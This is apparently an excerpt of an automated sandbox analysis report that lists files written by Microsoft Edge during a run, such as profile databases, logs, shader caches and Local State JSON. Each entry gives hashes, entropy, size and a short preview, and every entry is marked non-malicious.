                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, writer version 2, read version 2, file counter 8, database pages 11, cookie 0x7, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):45056
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.45949124614572384
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:TSWUYP5/ZrK/AxH1Aj5sAFWZmasamfDsCBjy8Uu/ziKmz1CUcI5fc:TnUYVAKAFXX+8jg1vcEc
                                                                                                                                                                                                                                                                                                        MD5:2A5BBF02352C68682CC325C2FEE58A18
                                                                                                                                                                                                                                                                                                        SHA1:0E0816CCF72E455A73546C18BC3A327DBD22A745
                                                                                                                                                                                                                                                                                                        SHA-256:54F75875D832134A72321E0DE0B4E82F15D52BE4F908AE2DE65C015F694A0C66
                                                                                                                                                                                                                                                                                                        SHA-512:FD181816BF7FF68F83C69FC03092115ED9E2C36F813DFAA0FC4060E18F60C15F8630174232A1B8956A36485D437653FDBBDDBEE1CAFA46DBE252B8225C48E65A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..................?.P................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.05422060562968252
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:GtStut4XUdhttStut4XUd/YR9XjhslotGLNl0ml/Vl/XoQXEl:Mt4Xozt4XfL1EjVl/PvoQ
                                                                                                                                                                                                                                                                                                        MD5:672BB6791FD5149A66A3A980ABCD2798
                                                                                                                                                                                                                                                                                                        SHA1:FD616ACED3C791A609423738088A8B26DC994DC4
                                                                                                                                                                                                                                                                                                        SHA-256:B53B36BEA6163E45A17D6302F499C26503F544641F5DADC582CD3B664D9FC89B
                                                                                                                                                                                                                                                                                                        SHA-512:9743B889C522DAB60067EDB104B621196E493EF8F577F60A5DD43F9FA8AC8F8A947B56929185FC18F1A9EE68CBAC202C3B6A4D9643DA439981F218EF106ED265
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:..-.......................3.0.;^...5../...`.*...-.......................3.0.;^...5../...`.*.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):86552
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8709863863731893
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:hmzxUVlO+cZcbX+STn9VAKAFXX+H2VAKAFXX+DNxOqVAKAFXX+BTnUYVAKAFXX+x:hexUpcjS4NsFNsXO5NskNsY8
                                                                                                                                                                                                                                                                                                        MD5:D826B24586CD15F88AF513558983F659
                                                                                                                                                                                                                                                                                                        SHA1:146CEA251950D0D9776C9EDA62EE84F3F7E52F6C
                                                                                                                                                                                                                                                                                                        SHA-256:F63D452F86EEA7269AA2F75E0E323C616A59ABEB026D0D53B88871F47A7B5501
                                                                                                                                                                                                                                                                                                        SHA-512:FD126E342B720CB3346A633FCC7DE9E95A62323C0BE59C0CAB3C5B62594C827275665FE0459400824FFE88156A6B604C451DA7888814A1688FA4B8BF6F782CD2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:7....-..........^...5...g.q.].........^...5...A...B.uSQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):400
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.742001224668491
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:/XntM+ol3sedhOkHOuuuuuuuuuuuPcBsedhOU:Alc8VOuuuuuuuuuuux8x
                                                                                                                                                                                                                                                                                                        MD5:FCD18CEAF82A8BACA07BB57C9B00558D
                                                                                                                                                                                                                                                                                                        SHA1:06AD98E22AC7A8C57C6F3F264C6181E03337DD10
                                                                                                                                                                                                                                                                                                        SHA-256:74B52D1EBE2C8F9F952BDDD8CDF887D39F7CF2D7F6C148EE516D652EEB3049DB
                                                                                                                                                                                                                                                                                                        SHA-512:F415AE892982FC89E9EA9F64654DEAF5B1BE4510D56795226B2C1B2BF36AF99B5ADE4260C1F7EFB5E2D1F85D5DA4A2CFCC6F0E736F4F380C807A4C64935E081B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:A..r.................20_1_1...1.,U.................20_1_1...1-.>g0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...................0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2080000674755365
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQcWq2PsZ23oH+TcwtfrK+IFUt8ORQVPdZmw+ORQVPvkwOsZ23oH+TcwtfrUeLJ:72BvkcYeb23FUt8O2V1/+O2Vn51cYeb5
                                                                                                                                                                                                                                                                                                        MD5:3014CF21D828CF47231D5FD3360DB671
                                                                                                                                                                                                                                                                                                        SHA1:D70CB8EA05541753B59F6B137F82A32FA7984D1D
                                                                                                                                                                                                                                                                                                        SHA-256:5227BF95548CF69AB675B562C65297FCA882486C120EBDBBA716D50952E2BA5F
                                                                                                                                                                                                                                                                                                        SHA-512:6177C6A1ACE87C3F9BBE68FFF7E8CFBB25F9E7EF6A18E2B49FA01A447D65EFE2D6AB32E6493AF194F6026B59825E91C0128F2767E8F00F637850DF5CF0817864
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.414 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/18-08:55:33.415 1eb4 Recovering log #3.2024/12/18-08:55:33.415 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2080000674755365
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQcWq2PsZ23oH+TcwtfrK+IFUt8ORQVPdZmw+ORQVPvkwOsZ23oH+TcwtfrUeLJ:72BvkcYeb23FUt8O2V1/+O2Vn51cYeb5
                                                                                                                                                                                                                                                                                                        MD5:3014CF21D828CF47231D5FD3360DB671
                                                                                                                                                                                                                                                                                                        SHA1:D70CB8EA05541753B59F6B137F82A32FA7984D1D
                                                                                                                                                                                                                                                                                                        SHA-256:5227BF95548CF69AB675B562C65297FCA882486C120EBDBBA716D50952E2BA5F
                                                                                                                                                                                                                                                                                                        SHA-512:6177C6A1ACE87C3F9BBE68FFF7E8CFBB25F9E7EF6A18E2B49FA01A447D65EFE2D6AB32E6493AF194F6026B59825E91C0128F2767E8F00F637850DF5CF0817864
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.414 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/18-08:55:33.415 1eb4 Recovering log #3.2024/12/18-08:55:33.415 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old~RF2f36e.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2080000674755365
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQcWq2PsZ23oH+TcwtfrK+IFUt8ORQVPdZmw+ORQVPvkwOsZ23oH+TcwtfrUeLJ:72BvkcYeb23FUt8O2V1/+O2Vn51cYeb5
                                                                                                                                                                                                                                                                                                        MD5:3014CF21D828CF47231D5FD3360DB671
                                                                                                                                                                                                                                                                                                        SHA1:D70CB8EA05541753B59F6B137F82A32FA7984D1D
                                                                                                                                                                                                                                                                                                        SHA-256:5227BF95548CF69AB675B562C65297FCA882486C120EBDBBA716D50952E2BA5F
                                                                                                                                                                                                                                                                                                        SHA-512:6177C6A1ACE87C3F9BBE68FFF7E8CFBB25F9E7EF6A18E2B49FA01A447D65EFE2D6AB32E6493AF194F6026B59825E91C0128F2767E8F00F637850DF5CF0817864
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.414 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/18-08:55:33.415 1eb4 Recovering log #3.2024/12/18-08:55:33.415 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):787
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.056995536428428
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJh/U/9Y+chRb3lZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhCe+cjl+t3IvB8s
                                                                                                                                                                                                                                                                                                        MD5:40B6B0DCC66AAA4C5682003FECC64A07
                                                                                                                                                                                                                                                                                                        SHA1:20AE0B55572A0B64D67E78FA0FE820B090DF9BA5
                                                                                                                                                                                                                                                                                                        SHA-256:A379994DD583940DB26212DF11696B01631E8ED821A74D5F03005DF261BFAEF2
                                                                                                                                                                                                                                                                                                        SHA-512:4BAC37BFC3C37906109EC375533D1AA68F55E2C5F92134728896846049C9107A91EE98A695F0A3B044B5D2F62BAA4C4B93EDD655E9DBDC2F2C31F808096FF12E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....{a...................19_.....f.F..................18_.......|.................37_.......&B.................38_........D.................39_..........................20_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):340
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.184490980376741
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQQPOq2PsZ23oH+TcwtfrzAdIFUt8ORQ2PZmw+ORQ2dkwOsZ23oH+TcwtfrzILJ:72UOvkcYeb9FUt8O22P/+O22d51cYebS
                                                                                                                                                                                                                                                                                                        MD5:84F421BB043FF2A0ECD32C9FC07930A5
                                                                                                                                                                                                                                                                                                        SHA1:4BB856BA29E29BDC1BE95EB82920FCFF7033C93D
                                                                                                                                                                                                                                                                                                        SHA-256:ADCE7015B475F6F2208D4BAEED4DE03588B51C2FB03E44F48C7B91384D859C35
                                                                                                                                                                                                                                                                                                        SHA-512:E158C8A78DD58FC24FEE07F1D135BA868852D4C6D1B6D5072531145C28DCEA7C0600F00E49309834FE6ECEB72BB19F8F6F557233341E8E1CE2E84342B2057E37
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.410 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/18-08:55:33.412 1eb4 Recovering log #3.2024/12/18-08:55:33.412 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):340
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.184490980376741
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQQPOq2PsZ23oH+TcwtfrzAdIFUt8ORQ2PZmw+ORQ2dkwOsZ23oH+TcwtfrzILJ:72UOvkcYeb9FUt8O22P/+O22d51cYebS
                                                                                                                                                                                                                                                                                                        MD5:84F421BB043FF2A0ECD32C9FC07930A5
                                                                                                                                                                                                                                                                                                        SHA1:4BB856BA29E29BDC1BE95EB82920FCFF7033C93D
                                                                                                                                                                                                                                                                                                        SHA-256:ADCE7015B475F6F2208D4BAEED4DE03588B51C2FB03E44F48C7B91384D859C35
                                                                                                                                                                                                                                                                                                        SHA-512:E158C8A78DD58FC24FEE07F1D135BA868852D4C6D1B6D5072531145C28DCEA7C0600F00E49309834FE6ECEB72BB19F8F6F557233341E8E1CE2E84342B2057E37
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.410 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/18-08:55:33.412 1eb4 Recovering log #3.2024/12/18-08:55:33.412 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old~RF2f35f.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):340
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.184490980376741
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQQPOq2PsZ23oH+TcwtfrzAdIFUt8ORQ2PZmw+ORQ2dkwOsZ23oH+TcwtfrzILJ:72UOvkcYeb9FUt8O22P/+O22d51cYebS
                                                                                                                                                                                                                                                                                                        MD5:84F421BB043FF2A0ECD32C9FC07930A5
                                                                                                                                                                                                                                                                                                        SHA1:4BB856BA29E29BDC1BE95EB82920FCFF7033C93D
                                                                                                                                                                                                                                                                                                        SHA-256:ADCE7015B475F6F2208D4BAEED4DE03588B51C2FB03E44F48C7B91384D859C35
                                                                                                                                                                                                                                                                                                        SHA-512:E158C8A78DD58FC24FEE07F1D135BA868852D4C6D1B6D5072531145C28DCEA7C0600F00E49309834FE6ECEB72BB19F8F6F557233341E8E1CE2E84342B2057E37
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.410 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/18-08:55:33.412 1eb4 Recovering log #3.2024/12/18-08:55:33.412 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zEflQRpvlt:/M/xT02zxPvlt
                                                                                                                                                                                                                                                                                                        MD5:39207D9A95B87E47F993FAACBCFFC8E5
                                                                                                                                                                                                                                                                                                        SHA1:1E8D5152277A9CC0AE7D06E3D8DFBF99CC154614
                                                                                                                                                                                                                                                                                                        SHA-256:598DBB02B106B495886F981062C9007EBD1EBC3A071865047AEDA16C9EEC5F77
                                                                                                                                                                                                                                                                                                        SHA-512:18FF8D60F639DA5DD6C1F19DA0428395447350B81C65008DB4001A2F282EE691647332BD8603CD6493AB57F89A3306849863AECC84A062DDB3D13C77BF22B8A8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zEfljRp9t:/M/xT02zwp9t
                                                                                                                                                                                                                                                                                                        MD5:EB9BC7C3B184E9B99808B0742925F170
                                                                                                                                                                                                                                                                                                        SHA1:E68E9CDD6123B0224AD3828DB5693A44882DEFEA
                                                                                                                                                                                                                                                                                                        SHA-256:790B7200901072CC71E0F7D32F8A8E49A18FDA1A9A695CDEECB39B7504AAB10D
                                                                                                                                                                                                                                                                                                        SHA-512:486CCB0209EEBA1B4E953B6E6BC0A26DF760D5074B001B74DC9CB3AD26A5D0A30C4570FE44A385C5F0DD1FB26A0582DC6CA8D7FFF7276BBE5EAD2C5A2E1E6487
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):120
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                        MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                        SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                        SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                        SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                        MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                        SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                        SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                        SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2e3fd.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
